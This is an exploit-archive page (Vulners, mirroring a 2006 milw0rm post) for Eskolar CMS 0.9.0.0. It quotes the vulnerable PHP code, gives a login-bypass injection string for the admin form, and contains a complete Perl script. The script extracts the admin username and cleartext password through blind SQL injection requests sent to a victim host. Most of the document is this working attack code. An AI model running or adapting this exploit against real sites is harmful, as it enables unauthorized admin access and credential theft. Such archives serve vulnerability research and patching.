Vulners
Lucene search
Eskolar CMS 0.9.0.0 Remote Blind SQL Injection Exploit
#==================================================================================================
#!/usr/bin/perl
use IO::Socket;
#==================================================================================================
#==============================================================================#
# Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com #
#==============================================================================#
#==================================================================================================
#Title: Eskolar CMS 0.9.0.0 Blind SQL Injection Exploit and bypass admin logon vulnerability
#Application: Eskolar CMS
#Version: 0.9.0.0
#Url: http://sourceforge.net/projects/eskolar/
#==================================================================================================
#==================================================================================================
#Affected software description:
#Not properly sanitized input can be used to inject crafted SQL queries and cause
#the database server to generate an invalid SQL query. We can use Blind SQL Injection attack
#to determine username and password for CMS and also classical SQL Injection
#to bypass admin logon. Password for CMS is storing in database as clear text!
#There is using addslashes() function to filtration GET variables, but we can prepare
#SQL query without slashes in Blind attack. There is not addslashes() function to filtration
#variables using to log in, so we can use classical SQL Injection to log in as admin.
#Vulnerable files: index.php, php/lib/del.php, php/lib/download_backup.php, php/lib/navig.php,
#php/lib/restore.php, php/lib/set_12.php, php/lib/set_14.php, php/lib/upd_doc.php
#==================================================================================================
#==================================================================================================
#Sample vulnerable code: (Blind attack) (index.php - lines 161-172)
#if (isset ($_GET['gr_1_id'])) {
# $gr_1_id = (get_magic_quotes_gpc()) ? $_GET['gr_1_id'] : addslashes($_GET['gr_1_id']);
#}
#if (isset ($_GET['gr_2_id'])) {
# $gr_2_id = (get_magic_quotes_gpc()) ? $_GET['gr_2_id'] : addslashes($_GET['gr_2_id']);
#}
#if (isset ($_GET['gr_3_id'])) {
# $gr_3_id = (get_magic_quotes_gpc()) ? $_GET['gr_3_id'] : addslashes($_GET['gr_3_id']);
#}
#if (isset ($_GET['doc_id'])) {
# $doc_id = (get_magic_quotes_gpc()) ? $_GET['doc_id'] : addslashes($_GET['doc_id']);
#}
#...
#index.php - line 202
#$q = "SELECT * FROM ".$prefix."_admin_group_3 WHERE id = ".$gr_3_id." ORDER BY 'sorted' ASC";
#etc.
#...
#==================================================================================================
#==================================================================================================
#Bypass admin logon:
#Vulnerable code: (php/esa.php - lines 27-35)
#$uid = isset ($_POST['uid']) ? $_POST['uid'] : $_SESSION['uid'];
#$pwd = isset ($_POST['pwd']) ? $_POST['pwd'] : $_SESSION['pwd'];
#//$prefix="esa";
#$enter = 0;
#$_SESSION['uid'] = $uid;
#$_SESSION['pwd'] = $pwd;
#mysql_select_db($database_bkb, $bkb);
#$q_a = "SELECT * FROM ".$prefix."_admin_user WHERE `user` = '".$uid."' AND `password` = '".$pwd."'";
## If magic_quotes_gpc = Off attacker can log in as admin using classical SQL Injection attack.
## Eg: USER: j4ck' or 1=1/*
## PSW: *blank*
#===================================================================================================
#PoC Exploit:
if ((@ARGV lt 2) or (@ARGV gt 3))
{
&usage;
}
sub usage()
{
print "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n";
print "- Exploit for Eskolar CMS 0.9.0.0\r\n\r\n";
print "- Usage: $0 <target> <target directory>\r\n";
print "- <target> -> Victim's target eg: http://www.victim.com\r\n";
print "- <target directory> -> Path to index.php eg: /eskolar/\r\n";
print "- Eg: http://127.0.0.1 /esa/\r\n\r\n";
exit();
}
$HOST = $ARGV[0];
$DIR = $ARGV[1];
$prefixDB = $ARGV[2];
if (@ARGV eq 2)
{
$prefixDB = "esa";
}
print "\r\nATTACKING : ".$HOST.$DIR."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;
#$positive = "?doc_id=999%20or%201=1--";
#$negative = "?doc_id=999%20or%201=0--";
@ARR = ("user","password");
print "Connecting ...\r\n";
sleep(1);
TOP:
for ($k=0;$k<=$#ARR;$k++)
{
$j=1;
$i = 32;
$string='';
$res='';
while()
{
$l=0;
for ($i=32;$i<=127;$i++)
{
$val = "?doc_id=99999";
$val .= "/**/or/**/1=1";
$val .= "/**/and/**/ascii(substring(";
$val .= "(select/**/$ARR[$k]/**/from/**/".$prefixDB."_admin_user/**/limit/**/1)";
$val .= ",$j,1))/**/=/**/$i";
$data="$DIR$val";
$req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error - connection failed!\r\n\r\n";
print $req "GET $data HTTP/1.1\r\n";
print $req "Host: $HOST\r\n";
print $req "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n";
print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n";
print $req "Accept-Encoding: gzip,deflate\r\n";
print $req "Keep-Alive: 300\r\n";
print $req "Connection: Keep-Alive\r\n";
print $req "Cache-Control: no-cache\r\n";
print $req "Connection: close\r\n\r\n";
while ($ans = <$req>)
{
if ($ans =~ /404/ )
{
printf "\n\nFile not found.\r\n\r\n";
exit;
}
if ($ans =~ /400/ )
{
printf "\n\nBad request.\r\n\r\n";
exit;
}
if ($ans =~ /ORDER BY sorted ASC/)
{
$string .= chr($i);
if (((ord(substr($string,length($string)-1,length($string)-1))-ord(substr($string,length($string)-2,length($string)-2))) %2 eq 0) and (length($string) ge 2))
{
$res .= chr($i-1);
$l=1;
}
last;
}
}
if ($l eq 1)
{
print "Found: ".chr($i-1)."\r\n";
sleep(1);
last;
}
if ($i eq 127)
{
print "$ARR[$k] found: $res\r\n";
$ARR[$k] = $res;
if (($k eq 1) and (($ARR[0] ne '') or ($ARR[1] ne '')))
{
print "\r\n\r\n\r\n-------------------- Username => $ARR[0]";
print " Password => $ARR[1] -----------------------\r\n";
}
elsif (($ARR[0] eq '') and ($ARR[1] eq ''))
{
print "Nothing found ...";
}
if ($k eq 0)
{
sleep(1);
print "\nTrying Password\r\n";
sleep(1);
}
sleep(1);
next TOP;
}
print "\t\t\t\tTrying: ".chr($i)."\r\n";
}
$string = '';
$j++;
}
}
#========================================================================================================
# milw0rm.com [2006-07-18]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jul 2006 00:00Current
7.1High risk
Vulners AI Score7.1